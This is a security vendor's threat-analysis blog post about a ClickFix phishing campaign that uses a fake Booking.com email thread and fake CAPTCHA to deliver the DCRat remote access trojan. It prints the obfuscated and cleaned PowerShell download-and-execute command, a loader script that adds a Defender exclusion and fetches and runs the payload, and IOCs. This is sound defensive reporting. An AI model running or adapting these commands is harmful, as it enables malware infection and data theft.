Tricking users with ClickFix to deliver DCRat via fake email thread

We recently saw an attack that used a nifty little JavaScript trick to try to deliver a DCRat malware payload with some help from the user. The attack started with a fake email thread about a potential upcoming apartment rental. The attacker indicates that a colleague of theirs started to book a rental apartment, but then got ill, so they handed the job off (to the attacker).

The attacker indicates that while looking for an accommodation policy, Booking[.]com mentioned an accommodation surcharge. They wanted to confirm that this surcharge information information was indeed accurate, so their message includes a link to Booking[.]com’s “Accommodation Rules” page for the target to review. This is a malicious link.

Fake email thread

The malicious link (which has since been flagged by Cloudflare) takes the target to a Cloudflare Turnstile CAPTCHA.

Cloudflare Turnstile CAPTCHA

After the real CAPTCHA comes a fake CAPTCHA. The favicon and tab title reflect Booking[.]com, but the CAPTCHA is a JavaScript-powered payload delivery system. When a user clicks the checkbox to confirm their non-robot status…

Fake CAPTCHA

…the following code snippet is automatically copied to their clipboard:


powERsheLl /nOPR"o" ―W h -c "$url = 'getsyv[.]com';$s"cr"i"pt" = I"nv"oke-"RestM"et"hod" -"Ur"i $url;I"n"vok"e-"Ex"p"re"ss"ion $scr"ip"t"

This script has simple obfuscation. With the formatting cleaned up, it looks like:


powershell /noprofile -windowstyle hidden -command "
$url = 'getsyv[.]com';
$script = Invoke-RestMethod -Uri $url;
Invoke-Expression $script
"

At this point, the CAPTCHA window changes to include two “Verification Steps” for the target:

  1. Press Windows+R
  2. Press CTRL+V and press ENTER
Updated fake CAPTCHA with new instructions

If the target follows those steps, they’ll paste the command into a Run window.

The malicious command pasted into a Run window

If they click OK, they’re taken to a Windows PowerShell UAC window.

UAC window for running the malicious PowerShell script

This PowerShell will then run in the background kicking off the script.

Loader script

Once run, the script reaches out to a server with the following HTTP request:


GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4046
Host: getsyv[.]com
Connection: Keep-Alive

The response from the server is:


HTTP/1.1 200 OK
date: Mon, 19 May 2025 19:01:07 GMT
server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
vary: User-Agent
last-modified: Thu, 15 May 2025 18:14:23 GMT
etag: "2de-63530a2a52e3f"
accept-ranges: bytes
content-length: 734

function VoidHelp {
	while ($true) {
		
    $command = "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
	
    $proc = Start-Process powershell.exe `
        -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `$ErrorActionPreference='Stop'; $command" `
        -Verb RunAs `
        -PassThru
		
    $proc.WaitForExit()
	
    if ($proc.ExitCode -eq 0) {
        Start-Sleep -Seconds 5
		RecHelp
        break
    } else {
    }
}
}

function RecHelp {
$iks = @{
"ny8DsFfwg1" = "FLiAHJErkN"
}
$url = "http://gettsveriff[.]com/bgj3/ckjg.exe"
$destination = "C:\Windows\Temp\tybd7.exe"
Invoke-WebRequest -Uri $url -Headers $iks -OutFile $destination
Start-Process -FilePath $destination
}

VoidHelp

The script is a simple PowerShell script designed to download and execute a malicious file.

DCRat malware

The downloaded file (ckjg.exe - 08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198) is DCRat (DarkCrystal), a commonly observed malicious .Net-based remote access trojan (RAT) that has been observed since 2019. DCRat supports functions commonly observed by RATs such as executing shell commands, keylogging, exfiltration of files, browser cookies, saved passwords, and clipboard contents.

It has been widely used by both cybercrime and nation state actors. As DCRat has been documented many times we will skip the in-depth analysis. Using the configuration included within the executable, the following indicators of compromise (IOCs) were observed.

IOCs

DCRat malware (sha256 of ckjg.exe)

  • 08037de4a729634fa818ddf03ddd27c28c89f42158af5ede71cf0ae2d78fa198

Filename of DCRat when saved to disk

  • C:\Windows\Temp\tybd7.exe

DCRat C2 servers

  • hkfasfsafg[.]click
  • hfjwfheiwf[.]click
  • jfhaowhfjk[.]click
  • hfjaohf9q3[.]click
  • fshjaifhajfa[.]click

Server within ClickFix PowerShell command

  • getsyv[.]com

Server hosting DCRat payload

  • gettsveriff[.]com

Emerging Threats Network IDS Signature

Detection signals

Sublime's AI-powered detection engine prevented this attack. Some of the top signals for this attack were:

  • New link domain (<=10d) from untrusted sender: The link within the message contained a newly registered domain name (extrannet-ruless[.]com).
  • Social engineering: The email creates a scenario involving a sick colleague to appeal to recipient's helpfulness and urgency.
  • Brand impersonation: The message references Booking[.]com but links to an unrelated domain (extrannet-ruless[.]com).
  • Fake thread: The email thread has been fabricated to include a legitimate-looking message sent from the target company.
  • Lookalike domain: The message contains a link to extrannet-ruless[.]com, which is similar to an admin portal on Booking[.]com named the Extranet.

ASA, Sublime’s Autonomous Security Analyst, flagged this email as malicious. Here is ASA’s analysis summary:

Stay secure against email-based ClickFix attacks

Attackers are always testing new ways to deliver payloads. That’s why the most effective email security platforms are adaptive, using AI and machine learning to shine a spotlight on seemingly minor discrepancies.

If you enjoyed this Attack Spotlight, be sure to check our blog every week for new blogs, subscribe to our RSS feed, or sign up for our monthly newsletter. Our newsletter covers the latest blogs, detections, product updates, and more.

Read more Attack Spotlights:

About the Author

About the Authors

Author headshot

Josh "Soup" Campbell

Detection

Soup is an Email Security Analyst at Sublime. With his background in InfoSec and proud membership of the SecKC community, security is both his profession and his passion. Soup was drawn to security by his need to protect people from threats and scams.

Author headshot

Brandon Murphy

Detection

Brandon is a Threat Detection Engineer at Sublime. He is a seasoned cybersecurity professional with over a decade of experience protecting internet users. Prior to Sublime, Brandon put his detection engineering expertise to use as a Sr. Staff Threat Analyst at Proofpoint.

Get the latest

Sublime releases, detections, blogs, events, and more directly to your inbox.

You're now subscribed. Expect a monthly email from us in your inbox.
Oops! Something went wrong while submitting the form.